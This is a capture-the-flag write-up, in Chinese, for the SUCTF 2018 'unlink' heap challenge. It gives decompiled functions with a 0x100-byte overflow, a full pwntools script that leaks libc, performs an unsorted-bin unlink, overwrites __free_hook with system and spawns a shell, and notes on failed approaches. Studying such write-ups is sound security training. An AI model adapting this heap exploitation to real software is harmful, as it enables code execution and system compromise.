unsigned __int64 delete()
{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
puts("which node do you want to delete");
__isoc99_scanf("%d", &v1);
if ( (&buf)[v1] != 0LL && v1 >= 0 && v1 <= 9 )
{
free((&buf)[v1]);
(&buf)[v1] = 0LL;
}
return __readfsqword(0x28u) ^ v2;
}Problem: [SUCTF 2018 招新赛]unlink
没有UAF
libc版本2.23很低 没有tcache
unsigned __int64 take_note()
{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
puts("which one do you want modify :");
__isoc99_scanf("%d", &v1);
if ( (&buf)[v1] != 0LL && v1 >= 0 && v1 <= 9 )
{
puts("please input the content");
read(0, (&buf)[v1], 0x100uLL);
}
return __readfsqword(0x28u) ^ v2;
}固定写0x100存在溢出
from pwn import *
from LibcSearcher import *
#from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
io = remote("node4.anna.nssctf.cn",28846)
#io = process("./service")
e = ELF('./service')
libc = ELF('/home/rick/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')
def get_addr():
return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def bug():
attach(io)
s = lambda data :io.send(data)
sla = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num :io.recv(num)
ru = lambda delims, drop=True :io.recvuntil(delims, drop)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
ls = lambda data :log.success(data)
def add(size):
sla(b"chooice :",str(1))
sla(b"size :",str(size))
def delete(idx):
sla(b"chooice :",str(2))
sla(b"to delete",str(idx))
def show(idx):
sla(b"chooice :",str(3))
sla(b"to show",str(idx))
def edit(idx,content):
sla(b"chooice :",str(4))
sla(b"odify :\n",str(idx))
sla(b"the content",content)
add(0x10)
add(0x80)
add(0x80)#2
add(0x80)#3
bss = 0x6020c0
delete(1)
edit(0,b'a'*0x20)
show(0)
ru(b"a"*0x20)
leak_libc = uu64(r(6)) - 2 - libc.sym["__realloc_hook"]#gdb debug
offset = leak_libc + 2 + libc.sym["__realloc_hook"] + 0x6e #beacuse \0a broke the fd + bk
edit(0,b'a'*0x10+p64(0)+p64(0x91)+p64(offset)+p64(offset))
ls("libc_base=>"+hex(leak_libc))
offset_bss = bss + len(p64(0))*3
payload = p64(0)+p64(0x81)+p64(offset_bss-0x20)+p64(offset_bss-0x18)+b'a'*0x60+p64(0x80)+p64(0x90)
edit(2,payload)
delete(3)
#idx3 -> 0x6060b8
payload = b'a'*8+p64(leak_libc+libc.sym["__free_hook"])
edit(2,payload)
#attach(io)
payload = p64(leak_libc+libc.sym["system"])
edit(0,payload)
add(0x10)
edit(2,b'/bin/sh\x00')
delete(2)
#attach(io)
io.interactive()打unsortbin unlink
之前尝试打了_malloc_hook 的 one_gadget 三个打不进去
_free_hook 的 fake fastbin 一直报错
打unlink 后的 直接写got表还疯狂接收出错
flag 不是直接在根目录 在~/flag.txt